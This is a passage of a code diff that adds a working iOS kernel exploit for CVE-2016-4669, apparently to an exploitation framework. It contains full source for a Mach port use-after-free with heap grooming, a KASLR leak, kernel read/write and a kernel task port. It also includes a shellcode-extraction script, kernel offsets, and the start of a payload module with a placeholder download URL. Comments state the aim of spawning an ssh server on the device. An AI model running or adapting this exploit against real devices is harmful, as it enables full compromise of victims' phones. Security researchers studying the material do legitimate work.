+		}
+
+		for (unsigned j=0; j<PAGE_SIZE; j+=PORT_SIZE) {
+			many_ptr_t mp;
+			mp.p = buf + j;
+
+			if (find(&mp)) {
+				*off = j;
+				return i;
+			}
+		}
+	}
+
+	return -1;
+}
+
+int __update_super_port(int pipe[2], off_t off, char *buf, void (^fill)(many_ptr_t *mp))
+{
+	char __buf[PAGE_SIZE];
+	int ret = read(pipe[0], __buf, PAGE_SIZE-1);
+	if (ret != PAGE_SIZE-1) {
+		return -1;
+	}
+
+	if (buf == NULL)
+		buf = __buf;
+
+	many_ptr_t mp;
+	mp.p = buf + off;
+	fill(&mp);
+	
+	ret = write(pipe[1], buf, PAGE_SIZE-1);
+	if (ret != PAGE_SIZE-1) {
+		return -1;
+	}
+
+	return 0;
+}
+
+int super_port_read(int pipe[2], unsigned pipe_off,
+		void (^reader)(many_ptr_t *mp))
+{
+	char buf[PAGE_SIZE];
+	int ret = read(pipe[0], buf, PAGE_SIZE-1);
+	if (ret != PAGE_SIZE-1) {
+		return -1;
+	}
+
+	ret = write(pipe[1], buf, PAGE_SIZE-1);
+	if (ret != PAGE_SIZE-1) {
+		return -1;
+	}
+
+	many_ptr_t mp;
+	mp.p = buf + pipe_off;
+	reader(&mp);
+
+	return 0;
+}
+
+addr_t get_kaslr_slide(mach_port_t port, int pipe[2], unsigned off)
+{
+	kern_return_t kr = 0;
+	set_super_port(pipe, off, ^(many_ptr_t *mp) {
+		mp->p32[off32(IP_OBJECT_io_bits)] = IO_ACTIVE | IKOT_CLOCK;
+		mp->p32[off32(IP_OBJECT_io_references)] = 0x10;
+		mp->p32[off32(IP_OBJECT_io_lock_data_lock)] = 0;
+		mp->p32[off32(IP_OBJECT_io_lock_data_type)] = 0x11;
+	});
+
+	for (int i=0; i<0x200; i++) {
+
+		addr_t slide = i << 21;
+
+		update_super_port(pipe, off, ^(many_ptr_t *mp) {
+			mp->p32[off32(IPC_PORT_kobject)] = koffsets.system_clock + slide;
+		});
+
+		kr = clock_sleep_trap(port, 0, 0, 0, 0);
+		if (kr == KERN_SUCCESS) {
+			return slide;
+		}
+	}
+
+	return BAD_ADDR;
+}
+
+int super_port_to_tfp0(int pipe[2], unsigned off, addr_t task0, addr_t space0,
+		addr_t port_addr)
+{
+	set_super_port(pipe, off, ^(many_ptr_t *mp) {
+		mp->p32[off32(IP_OBJECT_io_bits)] = IO_ACTIVE | IKOT_TASK;
+		mp->p32[off32(IP_OBJECT_io_references)] = 0x10;
+		mp->p32[off32(IP_OBJECT_io_lock_data_lock)] = 0;
+		mp->p32[off32(IP_OBJECT_io_lock_data_type)] = 0x11;
+		mp->p32[off32(IPC_PORT_receiver)] = space0;
+		mp->p32[off32(IPC_PORT_kobject)] = task0;
+		// we don't do notify in mach_ports_register
+		mp->p32[off32(IPC_PORT_ip_srights)] = 0x10;
+
+		mp->p32[off32(IPC_PORT_ip_messages_imq_next)] =
+	       		port_addr + IPC_PORT_ip_messages_imq_next;
+		mp->p32[off32(IPC_PORT_ip_messages_imq_prev)] =
+	       		port_addr + IPC_PORT_ip_messages_imq_prev;
+		mp->p32[off32(IPC_PORT_ip_messages_imq_qlimit)] = 0x10;
+
+		mp->p32[off32(0x14)] = 6;
+		mp->p32[off32(0x18)] = 0;
+	});
+
+	return 0;
+}
+
+void kread(uint64_t from, void *to, size_t size)
+{
+#define BLOCK_SIZE 0xf00
+    mach_vm_size_t outsize = size;
+
+    size_t szt = size;
+    if (size > BLOCK_SIZE) {
+        size = BLOCK_SIZE;
+    }
+
+    size_t off = 0;
+
+    while (1) {
+        kern_return_t kr = mach_vm_read_overwrite(tfp0, off+from,
+		       	size, (mach_vm_offset_t)(off+to), &outsize);
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"mach_vm_read_overwrite failed, left: %zu, kr: %d", szt, kr);
+		return;
+	}
+        szt -= size;
+        off += size;
+        if (szt == 0) {
+            break;
+        }
+        size = szt;
+        if (size > BLOCK_SIZE) {
+            size = BLOCK_SIZE;
+        }
+    }
+#undef BLOCK_SIZE
+}
+
+uint32_t kr32(addr_t from)
+{
+	kern_return_t kr;
+	vm_offset_t buf = 0;
+	mach_msg_type_number_t num = 0;
+
+	kr = mach_vm_read(tfp0,
+			from,
+			4,
+			&buf,
+			&num);
+
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"mach_vm_read failed!\n");
+		return 0;
+	}
+	uint32_t val = *(uint32_t*)buf;
+	mach_vm_deallocate(mach_task_self(), buf, num);
+	return val;
+}
+
+uint32_t kw32(addr_t to, uint32_t v)
+{
+	kern_return_t kr;
+
+	kr = mach_vm_write(tfp0,
+			to,
+			(vm_offset_t)&v,
+			(mach_msg_type_number_t)4);
+
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"mach_vm_write failed!\n");
+	}
+
+	return kr;
+}
+
+int kread0_32(addr_t addr, void *result, mach_port_t super_port,
+	       	mach_port_t context_port)
+{
+	kern_return_t kr = mach_port_set_context(mach_task_self(),
+		       	context_port, addr - 8);
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"mach_port_set_context failed: %d", kr);
+		return -1;
+	}
+
+	kr = pid_for_task(super_port, (int *)result);
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"pid_for_task failed: %d", kr);
+		return -2;
+	}
+	return 0;
+}
+
+static void khexdump0(addr_t ptr, size_t n, mach_port_t port, mach_port_t ctx_port)
+{
+	for (int i=0; i<n; i+=2) {
+		uint32_t v1, v2;
+		kread0_32(ptr+i*4, &v1, port, ctx_port);
+		kread0_32(ptr+(i+1)*4, &v2, port, ctx_port);
+
+		NSLog(@"%08X %08X", v1, v2);
+	}
+}
+
+static void khexdump(addr_t ptr, size_t n)
+{
+	for (int i=0; i<n; i+=2) {
+		uint32_t v1, v2;
+		v1 = kr32(ptr+i*4);
+		v2 = kr32(ptr+(i+1)*4);
+		NSLog(@"%08X %08X", v1, v2);
+	}
+}
+
+void * alloc_x10_make_xml(int count, uint32_t data[4]) 
+{
+	char *ok_dict = malloc(0x100000);
+	unsigned pos = 0;
+	pos = sprintf(ok_dict, "<dict><key>a</key><array>");
+
+	for (int i=0; i<count; i++) {
+		pos += sprintf(ok_dict + pos,
+			"<data format=\"hex\">%08x%08x%08x%08x</data>",
+		       	htonl(data[0]), htonl(data[1]),
+		       	htonl(data[2]), htonl(data[3]));
+	}
+
+	sprintf(ok_dict+pos, "</array></dict>");
+	return ok_dict;
+}
+
+io_service_t alloc_x10_alloc(void *xml) 
+{
+	kern_return_t another_error = 0;
+	io_service_t i = MACH_PORT_NULL;
+
+	kern_return_t kr = io_service_add_notification_ool(master,
+			"IOServicePublish",
+			xml,
+			strlen(xml)+1,
+			MACH_PORT_NULL,
+			NULL,
+			0,
+			&another_error,
+			&i);
+
+	if (kr != KERN_SUCCESS || another_error != KERN_SUCCESS) {
+		NSLog(@"io_service_add_notification_ool failed %d, %d",
+				kr, another_error);
+		return MACH_PORT_NULL;
+	}	
+
+	return i;
+}
+
+addr_t kread0_port_addr(addr_t space,
+		mach_port_t port, mach_port_t super_port,
+		mach_port_t ctx_port)
+{
+	addr_t is_table_size;
+	addr_t is_table;
+	addr_t addr;
+	kern_return_t kr = KERN_SUCCESS;
+
+	kr = kread0_32(space + SPACE_is_table_size, &is_table_size,
+			super_port, ctx_port);
+	if (kr != KERN_SUCCESS) {
+		return 0;
+	}
+	
+	kr = kread0_32(space + SPACE_is_table, &is_table,
+			super_port, ctx_port);
+	if (kr != KERN_SUCCESS) {
+		return 0;
+	}
+
+	kr = kread0_32(is_table + (port >> 8)*0x10, &addr,
+			super_port, ctx_port);
+	if (kr != KERN_SUCCESS) {
+		return 0;
+	}
+
+	return addr;
+}
+
+#include <sys/types.h>
+#include <sys/sysctl.h>
+
+// This is an exploit for vulnerability described in [1].
+// 
+// To start lets roughly out like the exploit process. It's very 
+// similar to what detailed in [2]. The only difference
+// is we don't use an information leak bug.
+//
+// 1. We fill up 8 bytes kalloc zone with ool ports.
+// two port pointers each. We use the same port for all of them.
+//
+// 2. Free one ool message somewhere in the middle.
+//
+// 3. Trigger mach_ports_register bug to allocate
+// the block we released in 2. with 8 bytes allocation for
+// two port pointers and read the third port send right out of bound,
+// grabbing one of the pointers we placed into ool port messages without
+// proper reference.
+//
+// 4. Free the port we sent out of line and refill it with a pipe buffers.
+//
+// 6. Retrieve a dangling port send right via mach_ports_lookup.
+//
+// 7. Craft a fake IKOT_CLOCK port send right to get kernel slide.
+//
+// 8. Leak address of a port receive right using mach_port_request_notification on
+// a dangling port send right backed by a pipe buffer.
+//
+// 9. Use leaked port receive right pointer to setup kernel read via pid_for_task as
+// described in [2].
+//
+// 10. Use kernel read to convert dangling port into a kernel task send right.
+//
+// 11. Spawn ssh server and deploy gnu core utils.
+//
+// 12. Cleanup and exit.
+int main(int argc, char** argv)
+{
+	kern_return_t kr = KERN_SUCCESS;
+
+	resolve(io_service_add_notification_ool);
+	resolve(IOMasterPort);
+	resolve(mach_vm_read);
+	resolve(mach_vm_read_overwrite);
+	resolve(mach_vm_write);
+	resolve(mach_vm_deallocate);
+
+	kr = IOMasterPort(MACH_PORT_NULL, &master);
+	NSLog(@"master port: %x, kr: %d\n", master, kr);
+
+	// First we stop all other thread to reduce the "noise"
+	for_other_threads(^(thread_act_t t) {
+		kern_return_t kr = thread_suspend(t);
+		if (kr != KERN_SUCCESS) 
+			NSLog(@"could not suspend a thread");
+	});
+
+	// Set file limit for our process as high as possible,
+	// since we are using pipes as refill
+	set_nofile_limit();
+
+	int pipes[PIPES_CNT][2];
+
+	mach_port_t *ports_to_decom;
+	mach_port_t super_port;
+
+	// We are going to reclaim decommissioned pages
+	// with page size allocations via pipes.
+	// Prepare the buffer first.
+	char pipe_buf[PAGE_SIZE];
+	memset(pipe_buf, 0, sizeof(pipe_buf));
+
+	// We prepare a very minimal refill, so we don't panic
+	// in mach_ports_lookup trap when it needs to
+	// take port lock.
+	set_page_buffer_ports(pipe_buf, ^(many_ptr_t *mp, int i) {
+		mp->p32[off32(IP_OBJECT_io_bits)] = IO_ACTIVE;
+		mp->p32[off32(IP_OBJECT_io_lock_data_lock)] = 0;
+		mp->p32[off32(IP_OBJECT_io_lock_data_type)] = 0x11;
+		// we set ip_srights to some distinct value, the function
+		// mach_ports_lookup returns as back a send right 
+		// to the port, hence it increments ip_srights.
+		// We are going to use that later on to find the
+		// pipe buffer which captured the pages used
+		// for the super port.
+		mp->p32[off32(IPC_PORT_ip_srights)] = INIT_IP_RIGHTS;
+	});
+
+	// create pipe files first
+	if (pipes_create((int *)pipes, PIPES_CNT) < 0) {
+		NSLog(@"could not create pipes");
+		return -1;
+	}
+
+	// Allocate DECOM_PORTS_CNT ports continuously after some point 
+	// and mark one "super" port somewhere in the middle. 
+	// The super port is returned back via super_port argument.
+	//
+	// We places super_port without a proper reference into task's itk_registered
+	// using a bogus mach_ports_register call.
+	ports_to_decom = setup_super_port(&super_port, DECOM_PORTS_CNT);
+	if (ports_to_decom == NULL) {
+		return -1;
+	}
+
+	// exhaust PAGE_SIZE zone so once we trigger the garbage collection
+	// the allocator is going to start requesting the "fresh" pages.
+	mach_port_t page_ports[PAGE_PORTS_CNT];
+
+	for (int i=0; i<PAGE_PORTS_CNT; i++) {
+		page_ports[i] = alloc_port();
+		// allocate a page via mach ool messages
+		kalloc_page_ool_ports(page_ports[i]);
+	}
+
+	// Free pages to decommission from ports zone.
+	for (int i=0; i<DECOM_PORTS_CNT; i++) { 
+		mach_port_destroy(mach_task_self(), ports_to_decom[i]);
+	}
+	// Release the super port currently residing in 
+	// itk_registered task_t field.
+	mach_port_destroy(mach_task_self(), super_port);
+	// Trigger garbage collection
+	gc();
+	// Refill decommissioned port pages with pipe buffers
+	pipes_alloc((int *)pipes, PIPES_CNT, pipe_buf);
+
+	mach_port_t *ports = NULL;
+	mach_msg_type_number_t cnt = 3;
+
+	// Get the dangling port pointer back while incrementing
+	// ip_srights field.
+	kr = mach_ports_lookup(mach_task_self(), (mach_port_t **)&ports, &cnt);
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"mach_ports_lookup failed %x\n", kr);
+		return -1;
+	}
+
+	super_port = ports[2];
+	NSLog(@"got fake pipe port: %d", super_port);
+
+	// offset within the page where the super port used to reside.
+	unsigned pipe_off;
+	// the pipe buffer which reclaimed the super port page.
+	int super_pipe[2];
+
+	int pipe_idx = find_port_pipe((int *)pipes, &pipe_off);
+
+	if (pipe_idx >= 0) {
+		NSLog(@"got port pipe %d, off: %04x\n", pipe_idx, pipe_off);
+	} else {
+		NSLog(@"could not find port pipe");
+		exit(-1);
+	}
+
+	super_pipe[0] = pipes[pipe_idx][0];
+	super_pipe[1] = pipes[pipe_idx][1];
+
+	pipes[pipe_idx][0] = -1;
+	pipes[pipe_idx][1] = -1;
+	pipes_close((int *)pipes, PIPES_CNT);
+
+	// We have a send right to a port and full control over
+	// the backing memory via a pipe.
+	// 
+	// We use method described in [3] to get kernel ASLR slide.
+	addr_t slide = get_kaslr_slide(super_port, super_pipe, pipe_off);
+	NSLog(@"slide: %08lx", slide);
+
+	// Now we want to get kernel read using pid_for_task trap trick.
+	// The details on that can be found in [2]. 
+	//
+	// With control over content of a sand right we can setup a task send right.
+	// To get a kernel read we would need to have control of at least 4 bytes at
+	// a known kernel address (KA). Then we can point our send right task object
+	// to KA - offsetof(struct task, bsd_proc) and place the address we want
+	// to read from at KA.
+	// 
+	// To achieve that we are going to leak address of a receive port right
+	// we can control and use mach_port_set_context to place the address we
+	// want to read at known address. (port_t ip_context field).
+	//
+	// To leak a port address we setup up our super_port so we can register
+	// a notification port for MACH_NOTIFY_DEAD_NAME via 
+	// mach_port_request_notification.
+	set_super_port(super_pipe, pipe_off, ^(many_ptr_t *mp) {
+		mp->p32[off32(IP_OBJECT_io_bits)] = IO_ACTIVE;
+		mp->p32[off32(IP_OBJECT_io_references)] = 0x10;
+		mp->p32[off32(IP_OBJECT_io_lock_data_lock)] = 0;
+		mp->p32[off32(IP_OBJECT_io_lock_data_type)] = 0x11;
+		mp->p32[off32(IPC_PORT_ip_srights)] = 99;
+		mp->p32[off32(IPC_PORT_ip_messages_imq_qlimit)] = 99;
+		mp->p32[off32(IPC_PORT_ip_messages_imq_msgcount)] = 0;
+	});
+
+	mach_port_t old;
+
+	// For pid_for_task call to work we need to make sure
+	// our fake task object has non zero reference counter.
+	// The task reference counter field would land at
+	// ip_pdrequest field of a port located before the port we 
+	// are using to place our address at ip_context. So we spam
+	// ports with non zero ip_pdrequest, before allocating 
+	// the port.
+        mach_port_t notify_ports[NOTIFY_CNT];
+	mach_port_t ref_port = alloc_port();
+
+	for (int i=0; i<NOTIFY_CNT/2; i++) {
+		notify_ports[i] = alloc_port();
+		// set ip_pdrequest to ref_port address
+		kr = mach_port_request_notification(mach_task_self(), notify_ports[i],
+				MACH_NOTIFY_PORT_DESTROYED, 0, ref_port, 
+				MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
+
+		if (kr != KERN_SUCCESS) {
+			NSLog(@"mach_port_request_notification failed, %x", kr);
+		}
+	}
+
+	// create a port to leak the address of 
+	mach_port_t notify_port = alloc_port();
+
+	for (int i=NOTIFY_CNT/2; i<NOTIFY_CNT; i++) {
+		notify_ports[i] = alloc_port();
+		kr = mach_port_request_notification(mach_task_self(), notify_ports[i],
+				MACH_NOTIFY_PORT_DESTROYED, 0, ref_port, 
+				MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
+
+		if (kr != KERN_SUCCESS) {
+			NSLog(@"mach_port_request_notification failed, %x", kr);
+		}
+	}
+
+	uint32_t data[4];
+	memset(data, 0x41, sizeof(data));
+
+	// Since ip_requests is NULL our call to mach_port_request_notification
+	// is going to allocate array of two ipc_port_request structures from 16-kalloc zone
+	// to be able to place one notification port.
+	// 
+	// struct ipc_port_request {
+	//	union {
+	//		struct ipc_port *port;
+	//		ipc_port_request_index_t index;
+	//	} notify;
+	//
+	// 	union {
+	//		mach_port_name_t name;
+	//		struct ipc_table_size *size;
+	//	} name;
+	// };
+
+	//
+	// We want to have some control over the content of the blocks 
+	// around where that 16 bytes block is allocated.
+	//
+	// To allocate blocks with controlled data and size we are going to
+	// use io_service_add_notification_ool, as described in [2].
+	//
+	// First we prepare the xml content to trigger the allocations.
+	void *xml_many = alloc_x10_make_xml(0x800, data);
+
+	// fill up 16-kalloc, so further allocation are more
+	// predictable.
+	for (int i=0; i<0x20; i++) {
+		alloc_x10_alloc(xml_many);
+	}
+
+	void *xml_single = alloc_x10_make_xml(1, data);
+
+	mach_port_t x10_ports_many[X10_ALLOC_CNT];
+	mach_port_t x10_ports_single[X10_ALLOC_CNT];
+
+	// we allocate large amount of 16 byte blocks
+	for (int i=0; i<X10_ALLOC_CNT; i++) {
+		x10_ports_many[i] = alloc_x10_alloc(xml_many);
+		x10_ports_single[i] = alloc_x10_alloc(xml_single);
+	}
+
+	// Free some of them to "punch holes" in 16-kalloc which
+	// are surrounded by blocks we control.
+	for (int i=X10_ALLOC_CNT; i<X10_ALLOC_CNT; i++) {
+		mach_port_destroy(mach_task_self(), x10_ports_single[i]);
+	}
+	// Call to mach_port_request_notification allocates 0x10 bytes
+	// (two ipc_port_request structs), filling one of the holes 
+	// and stores the block at ip_requests field of ipc_port.
+	//
+	// First item in ip_requests has notify.index field indicating first empty
+	// record position, name.size points to the size of the table.
+	// 
+	// The second one contains our notification port,
+	// notify_port is stored as notify.port at offset 8 
+	kr = mach_port_request_notification(mach_task_self(), super_port,
+			MACH_NOTIFY_DEAD_NAME, 0, notify_port, 
+			MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"mach_port_request_notification failed kr: %x", kr);
+		exit(-1);
+	}
+
+	// Read back the value allocated via ip_requests.
+	__block addr_t ip_requests = 0;
+	super_port_read(super_pipe, pipe_off, ^(many_ptr_t *mp) {
+		ip_requests = mp->p32[off32(IPC_PORT_ip_requests)];
+	});
+	NSLog(@"got ip_requests: %lx", ip_requests);
+
+	// -8 we need for +8 pid offset in proc structure.
+	// + 8 is for second ipc_port_request record.
+	data[0] = ip_requests - 8 + 8;
+
+	free(xml_many);
+	// now prepare another xml to replace the block we allocated
+	// before with new data. We place our ip_requests pointer at 
+	// offset 0. 
+	xml_many = alloc_x10_make_xml(0x1000, data);
+
+	// free the previous allocation
+	for (int i=0; i<X10_ALLOC_CNT; i++) {
+		mach_port_destroy(mach_task_self(), x10_ports_many[i]);
+	}
+
+	// and refill with new content
+	for (int i=0; i<X10_ALLOC_CNT; i++) {
+		x10_ports_many[i] = alloc_x10_alloc(xml_many);
+	}
+		
+	// We hope that ip_requests + 0x10 was refilled with our
+	// data which has ip_requests pointer at offset 0. 
+	//
+	// Now we setup a task port and point kobject to 
+	// ip_requests - offsetof(struct task, bsd_proc) + 0x10,
+	// so when we call pid_for_task on it we are going to
+	// get ip_requests + 8, which is the address of notify_port
+	// we placed there before.
+	set_super_port(super_pipe, pipe_off, ^(many_ptr_t *mp) {
+		mp->p32[IP_OBJECT_io_bits] = IO_ACTIVE | IKOT_TASK;
+		// set reference counter so the port is never released
+		mp->p32[off32(IP_OBJECT_io_references)] = 0x10;
+		mp->p32[off32(IP_OBJECT_io_lock_data_lock)] = 0;
+		mp->p32[off32(IP_OBJECT_io_lock_data_type)] = 0x11;
+		mp->p32[off32(IPC_PORT_kobject)] = ip_requests - TASK_bsd_proc + 0x10;
+		mp->p32[off32(IPC_PORT_ip_srights)] = 0x10;
+		mp->p32[off32(IPC_PORT_ip_requests)] = ip_requests;
+	});
+
+	addr_t notify_port_addr;
+	kr = pid_for_task(super_port, (int *)&notify_port_addr);
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"pid_for_task failed");
+		exit(-1);
+	}
+	NSLog(@"notify addr: %lx", notify_port_addr);
+	// Update the content of the task port so when we call pid_for_task
+	// it's going to use the value of notify_port ip_context field
+	// as bsd_info.
+	update_super_port(super_pipe, pipe_off, ^(many_ptr_t *mp) {
+		mp->p32[off32(IPC_PORT_kobject)] = notify_port_addr - TASK_bsd_proc + IPC_PORT_ip_context;
+	});
+
+	uint32_t dummy = 0;
+	if (kread0_32(koffsets.base + slide, &dummy, super_port, notify_port) < 0) {
+		NSLog(@"early kernel read failed");
+		exit(-1);
+	}
+	if (dummy != 0xFEEDFACE) {
+		NSLog(@"could not setup early kernel read");
+		exit(-1);
+	}
+	NSLog(@"got early kernel read");
+
+	// remove our notification port, to be able to safely release the 
+	// super_port later on.
+	kr = mach_port_request_notification(mach_task_self(), super_port,
+			MACH_NOTIFY_DEAD_NAME, 0, MACH_PORT_NULL, 
+			MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"mach_port_request_notification failed kr: %x", kr);
+		exit(-1);
+	}
+
+	// The only thing left to get arbitrary kernel read/write is to
+	// obtain some kernel artifacts.
+	addr_t kernel_task;
+	if (kread0_32(koffsets.kernel_task + slide, (uint32_t *)&kernel_task,
+		       	super_port, notify_port) < 0) {
+		exit(0);
+	}
+	NSLog(@"kernel_task: %lx", kernel_task);
+
+	addr_t kernel_space;
+	addr_t kernel_itk_self;
+	kread0_32(kernel_task + TASK_itk_self, (uint32_t *)&kernel_itk_self,
+			super_port, notify_port);
+	kread0_32(kernel_itk_self + IPC_PORT_receiver, (uint32_t *)&kernel_space,
+			super_port, notify_port);
+
+	NSLog(@"kernel_space: %lx", kernel_space);
+
+	addr_t self_space;
+	kread0_32(notify_port_addr + IPC_PORT_receiver, &self_space,
+				super_port, notify_port);
+	addr_t super_port_addr = kread0_port_addr(self_space, super_port,
+		       	super_port, notify_port);
+
+	NSLog(@"super_port_addr: %lx", super_port_addr);
+
+	// setup port for kernel task as outlined in [2]
+	super_port_to_tfp0(super_pipe, pipe_off, kernel_task, kernel_space,
+			super_port_addr);
+	NSLog(@"got tfp0");
+	tfp0 = super_port;
+
+	// resume thread, otherwise we lose some of 
+	// objective-C runtime functionality.
+	for_other_threads(^(thread_act_t t) {
+		kern_return_t kr = thread_resume(t);
+		if (kr != KERN_SUCCESS) 
+			NSLog(@"could not resume a thread");
+	});
+
+	shell_main(self_space, slide);
+
+	ports[0] = 0;
+	ports[1] = 0;
+	ports[2] = 0;
+	mach_ports_register(mach_task_self(), ports, 3);
+
+	mach_port_destroy(mach_task_self(), tfp0);
+	close(super_pipe[0]);
+	close(super_pipe[1]);
+	exit(0);
+	
+	return 0;
+}
diff --git a/external/source/exploits/CVE-2016-4669/macho_to_bin.py b/external/source/exploits/CVE-2016-4669/macho_to_bin.py
new file mode 100644
index 0000000000..5ac322203d
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/macho_to_bin.py
@@ -0,0 +1,27 @@
+import sys
+import base64
+
+fd = open(sys.argv[1], 'rb')
+macho = fd.read()
+fd.close()
+
+magic_start = "\x4F\xF0\x00\x00"*4
+magic_end = "\x4F\xF0\x01\x00"*4
+
+start = macho.find(magic_start) + len(magic_start) + 2
+end   = macho.find(magic_end)
+end   = (end & 0xfff0) + 0x10
+
+print("real len: 0x%x" % (end - start))
+
+blob = macho[start:start+0x400]
+print("code start: 0x%x" % start)
+print("code end: 0x%x" % end)
+
+fd = open(sys.argv[1] + ".b64", "wb+")
+fd.write(base64.b64encode(blob))
+fd.close()
+
+fd = open(sys.argv[1] + ".bin", "wb+")
+fd.write(blob)
+fd.close()
diff --git a/external/source/exploits/CVE-2016-4669/offsets.h b/external/source/exploits/CVE-2016-4669/offsets.h
new file mode 100644
index 0000000000..f0ff5965c1
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/offsets.h
@@ -0,0 +1,35 @@
+#ifndef OFFSETS_H
+#define OFFSETS_H
+
+#define IP_OBJECT_io_bits 0
+#define IP_OBJECT_io_references 4
+#define IP_OBJECT_io_lock_data_lock 8
+#define IP_OBJECT_io_lock_data_type 0x10
+
+#define IPC_PORT_ip_messages_imq_wait_queue 0x18
+#define IPC_PORT_ip_messages_imq_next 0x1c
+#define IPC_PORT_ip_messages_imq_prev 0x20
+#define IPC_PORT_ip_messages_imq_msgcount 0x28
+#define IPC_PORT_ip_messages_imq_qlimit 0x2c
+#define IPC_PORT_kobject 0x44
+#define IPC_PORT_receiver 0x40
+#define IPC_PORT_ip_requests 0x50
+#define IPC_PORT_ip_srights 0x5c 
+#define IPC_PORT_flags 0x64
+#define IPC_PORT_ip_context2 0x6c
+#define IPC_PORT_ip_context 0x68
+
+#define TASK_bsd_proc 0x1e8
+#define TASK_itk_space 0x1a0
+#define TASK_itk_self 0xa0
+
+#define PROC_ucred 0x8c
+
+#define SPACE_is_table_size 0x10
+#define SPACE_is_table 0x14
+
+// mount_common
+#define VNODE_v_mount 0x84
+#define MOUNT_mnt_flags 0x3c
+
+#endif
diff --git a/external/source/exploits/CVE-2016-4669/shell.h b/external/source/exploits/CVE-2016-4669/shell.h
new file mode 100644
index 0000000000..14310ebcd0
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/shell.h
@@ -0,0 +1,8 @@
+#ifndef SHELL_H
+#define SHELL_H
+
+#include "utils.h"
+
+void shell_main(addr_t self_space, addr_t slide);
+
+#endif
diff --git a/external/source/exploits/CVE-2016-4669/shell.m b/external/source/exploits/CVE-2016-4669/shell.m
new file mode 100644
index 0000000000..241a67a4a1
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/shell.m
@@ -0,0 +1,171 @@
+// [1] https://github.com/kpwn/yalu102/blob/master/yalu102/
+// [2] http://www.newosxbook.com/articles/CodeSigning.pdf
+
+#include "macho.h"
+#include "utils.h"
+#include "offsets.h"
+
+#define	MNT_ROOTFS	0x00004000
+#define	MNT_RDONLY	0x00000001
+#define	MNT_NOSUID	0x00000008
+
+#define PAYLOAD_URL_PLACEHOLDER "PAYLOAD_URL_PLACEHOLDER\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\